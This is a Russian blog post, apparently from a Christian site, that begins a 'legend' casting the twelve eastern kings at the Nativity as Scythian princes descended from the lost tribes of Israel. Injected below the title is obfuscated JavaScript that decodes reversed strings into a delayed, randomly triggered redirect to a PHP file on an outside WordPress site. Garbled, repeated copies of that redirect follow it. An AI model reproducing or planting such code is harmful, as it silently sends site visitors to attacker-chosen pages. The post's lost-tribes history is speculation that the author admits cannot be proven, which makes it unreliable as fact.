Иносказания

Легенда о двенадцати царях


$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Откуда появились славянеСкифыГоты? От ответа на эти вопросы зависит многое в понимании. И здесь нас ожидает огромная, я бы сказал глобальная неожиданность!

Я не буду обременять вас всеми теми многочисленными источниками, фактами, и датами, которыми обычно закидывают читателя, пока тот, утомленный чтением и борьбой, не крикнет: «Хватит! Сдаюсь! Верю!» И прекращает читать, и забывает, и теряет интерес к теме. Я и сам этим занимался, к примеру, в своей книге «Славянское христианство» (2013).

И многое за этими охапками фактов проглядел! Но на этот раз я просто буду рассказывать историю, которую, я надеюсь, вам захочется читать дальше, и еще дальше.

Вы любите легенды?

А история эта будет в форме исторической Притчи, или Легенды. С продолжением. Историки обычно называют свои исторические (чуть не написал – фантастические) теории былью, я же назову то, что мне представляется былью – Легендой. Кто-то скажет, что мои выводы слишком фантастичны, чтобы быть правдой. Не буду тут спорить. Лучше сесть, по совету Иисуса Христа, на более низкое место и назвать историю легендой, и когда-то получить приглашение сесть повыше, нежели называть свою теорию (легенду) историей и самому усадить себя на почетное место. Я сяду пониже и подожду.

Надеюсь эта легенда поможет вам увидеть историю Древнего Мира, и, как результат, современную историю – без напущенного историками и идеологами жёлтого тумана.

Позвольте мне для начала – для очень интересного начала – поделиться с вами одной древней традицией, тоже почти легендой. Я передам её в моём несколько субъективном понимании и исполнении. И с некоторыми техническими комментариями. В этой публикации я только начну её представлять, а в последующих – продолжу. Историю эту я собрал долгие годы из многих источников. А поделиться ею я хочу не в одном жанре, а путём смешения разных жанров.

Итак.

Есть такая древняя традиция-легенда – о двенадцати царях, которых известили звездочеты и мудрецы о появлении особенной звезды. И они пошли поклониться Иисусу и принести Ему дары. На протяжении многих столетий люди так и понимали, так и верили. Отсюда, к примеру, празднование двенадцати дней Рождества на Западе, дней двенадцати царей в испаноязычных странах, и традиция дарить подарки – повсеместно.

Так вот, об этих царях, а точнее о народах, которые они представляли, я и хотел бы с вами поговорить в ряде моих полу-художественных публикаций. Цари эти знали, хотя бы отчасти – что это за звезда, и знали, к Кому она ведёт. И двенадцать царей решили поехать вместе и поклониться новорожденному Царю царей. Так они и сделали. Снарядили караван, с подарками, охраной, многими вьючными животными – и пустились в путь, с Востока на Запад.

Это были, конечно же, цари с востока, спешащие поклониться Царю-Младенцу. Одиннадцать из этих царей были равны по славе. Двенадцатый же был царь над всеми ими, и происходил он из самого славного из этих народов. И был он добр и справедлив, храбр и благороден, и любим – не только своими гражданами, но и другими царями. Так что жили они дружно. И вот теперь дружно ехали они поклониться Царю царей.

И были это – как я постараюсь показать – князья Великой Скифии. Князья конфедерации народов, которая, по признанию всех историков, в это время и контролировала практически все доступные пространства Евразии: от Дуная и до Сибири, Китая, Ирана. И были скифы – братскими народами. И слышали эти славные, богобоязненные цари, Богом призванные, что родится в мир Царь, владычество Которого будет вечным, и повсеместным. И спешили теперь поклониться Ему.

Эти двенадцать князей совсем не были злыми и тупыми, как царь Ирод, который хотел убить Младенца. Нет. Они спешили поклониться Младенцу, выразить Ему свою покорность и службу, принести Ему дары. Они ожидали увидеть Его в царских палатах. И звезда вела их в Иерусалим.

Первый раз они, эти двенадцать царей, ступали на Святую землю, первый раз видели своими глазами гору Ефремову, море Галилейское, холмы Иудеи. Но как будто казалось им, что все это они где-то уже видели. Что как будто были уже здесь – будто это родная их земля. Или же – земля их далеких, забытых предков?

Но пока мы оставим их в пути, и встретимся с ними чуть позднее – в продолжении нашей истории. А пока позвольте прервать эту притчу кратким комментарием-справкой.

Комментарий

Мне так и хочется крикнуть этим царям с востока: все верно, это ваша земля, вы отсюда и вышли. Уже не раз я обращался к теме скифов, которые, по мнению ряда исследователей, являются потомками одиннадцати потерянных колен Израилевых. Хотя эта теория, как и все прочие, традиционные исторические построения и выводы, недоказуема, она все же кажется мне самой очевидной и вероятной. Об этом я пишу в своей книге «Россия – Цари с Востока» (Тула, Имидж пресс, 2018).

Появление скифов на исторической арене в период падения Ассирийской империи весьма примечательно. Именно в то время пришел конец Ассирийскому пленению, в которые попали в 722-ом году до Р.Х. одиннадцать колен, или племен Израильских. Только колено Иудино тогда осталось на месте. Остальные же 11 колен, так называемое Северное Царство, или Израиль, как его называли (в отличие от Южного Царства – Иуды) было отведено в Ассирийское пленение.

Когда же Ассирийская империя пала и на её место пришёл Вавилон, 11 колен вышли из Ассирии и направились на Север, поселившись вначале на северном побережье Чёрного моря. И вот их передвижения в районе Чёрного моря, а затем ко всем сторонам света и многовековое владычество над большей частью континента – это уже не легенда, а реальность. Сбылись, наконец, все пророчества и обещания, данные Богом Аврааму, и повторённые патриархам, и многократно высказанные через пророков – о том, что многие великие народы и царства произойдут от Авраама. Вот и произошли. Только этого никто, к сожалению, и не заметил.

Этнический Израиль, то есть Северное Царство, одиннадцать «потерянных» колен – вовсе и не потеряны, и не растворились совершенно в племенах и народах. Как и было сказано о сыновьях Иакова (Израиля), они превратились в великие племена и народы, известные нам сегодня как славяне, готы, и как многие другие народы – составляющие этнический костяк стран Западной Европы.

Предлагаемая мною теория, или «Легенда» является альтернативой искусственному историческому туману и критическому взгляду на исполнение библейских пророчеств.

Мы ещё поговорим о том, как, во исполнение пророчеств пророка Даниила великую Римскую империю «забодают» однажды десять рогов, или народов. Пророк Даниил писал об этом событии почти за тысячу лет! И в точно назначенное время на исторической арене появляются эти рога-народы – появляются во исполнение пророчеств о расцвете и величии тех царств и народов, которые произошли из потерянных колен Израилевых.

Я знаю, есть большая вероятность, что как семитам, так и антисемитам может не понравиться с первого взгляда моя Легенда. Она может ошарашить, разгневать кого-то. Но все же я хочу, чтобы мой читатель задумался об этой Легенде — тогда он (или она) увидит, какая эта Легенда простая, складная и гармоничная, ожидаемая и неожиданная. На мой взгляд, тема ошеломляющая, имеющая огромную значимость и потенциал для буквально всякой сферы нашей жизни, от политики и науки, до культуры и религии. Но прежде, чем судить о моей Легенде строго, предлагаю ещё новые встречи с ней в моих публикациях здесь.

То есть – продолжение следует.

Не уходите далеко, друзья. Самое интересное, как всегда, ещё впереди.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

***

Поддержать служение

«Солёного радио», — сайт, YouTube канал, архив Яндекс Диска, — можно перечислив любую сумму на карту Сбер 4276 6600 1073 3772 (Дмитрий Александрович Б.). В сообщении можно написать просто «СР».

***

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Международный Телеграмм чат «Возвращение домой — общение православных и протестантов

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.